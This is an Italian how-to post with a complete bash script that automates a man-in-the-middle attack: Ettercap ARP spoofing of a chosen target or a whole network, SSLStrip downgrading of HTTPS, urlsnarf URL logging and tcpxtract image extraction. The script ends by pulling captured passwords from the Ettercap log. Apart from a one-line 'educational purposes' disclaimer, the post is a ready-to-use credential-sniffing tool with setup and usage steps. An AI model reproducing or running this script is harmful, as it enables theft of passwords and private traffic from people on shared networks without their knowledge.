ATTENZIONE: Questa guida è a scopo didattico, vi ricordo che qualsiasi uso illecito è un reato perseguibile penalmente.
Il seguente script permette di eseguire uno sniffing (quindi di catturare) sia le password sia i dati anche utilizzando connessioni cifrate SSL.
Software necessario: Ettercap, SSLStrip, URLSnaf, TCPXtract, Wireshark
Innanzitutto assicuriamoci che etter.conf sia quello di default. Dovreste trovarlo in /etc/etter.conf – le righe seguenti dovranno rimanere commentate:
Code:
# if you use iptables:
#redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”
#redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”
Questo perché utilizzeremo Ettercap per fare arpspoofing, ma non per creare falsi certificati (lavoro che lasceremo fare a SSLStrip).
Salva questo codice in un nuovo file e salviamolo come capture.sh (dopo fai in modo che il file sia eseguibile «chmod +x capture.sh»)
Code:
#!/bin/bash
echo -n “Vuoi eseguire Wireshark alla fine della cattura? Se si, LASCIA IN BIANCO ”
read -e NOYES
echo -n “Vuoi estrarre le immagini da pcap utiizzando tcpxtract? Se si, LASCIA IN BIANCO ”
read -e XTRACT
echo -n “Quale interfaccia utilizzo? ie wlan0: ”
read -e IFACE
echo -n “Nome della ‘Sessione’? (nome della cartella che sarà creata con tutti i files di log): ”
read -e SESSION
echo -n “Gateway IP – LASCIA IN BIANCO SE VUOI FARE ARP SU TUTTA LA NETWORK: ”
read -e ROUTER
echo -n “Target IP – LASCIA IN BIANCO SE VUOI FARE ARP SU TUTTA LA NETWORK: ”
read -e VICTIM
mkdir /root/$SESSION/
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log & iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
“$XTRACT”tcpxtract -f /root/$SESSION/$SESSION.pcap
“$NOYES”wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci
In pratica questo script eseguirà SSLstrip che scriverà un file .log, URLsnarf (che farà un dumping di tutte le urls in un file di testo .txt), Ettercap con arpspoofing che scriverà un log file (con le passwords) ed un pcap file (per analizzarlo successivamente).
Tutti i files saranno messi nella stessa cartella con filename identico (naturalmente con estensione diversa).
Mi raccomando di concludere lo script (quindi Ettercap) con il tasto “q”, così lo script chiuderà in modo corretto tutte le applicazioni (farà lo shutdown di SSLstrip, URLsnarf e farà un flushing di IPtables).
Cercherà automaticamente le password dal logfile di Ettercap (.eci) ed eseguirà Wireshark per ulteriori analisi. (TIP : ricorda di spuntare nella ricerca di wireshark la casella string).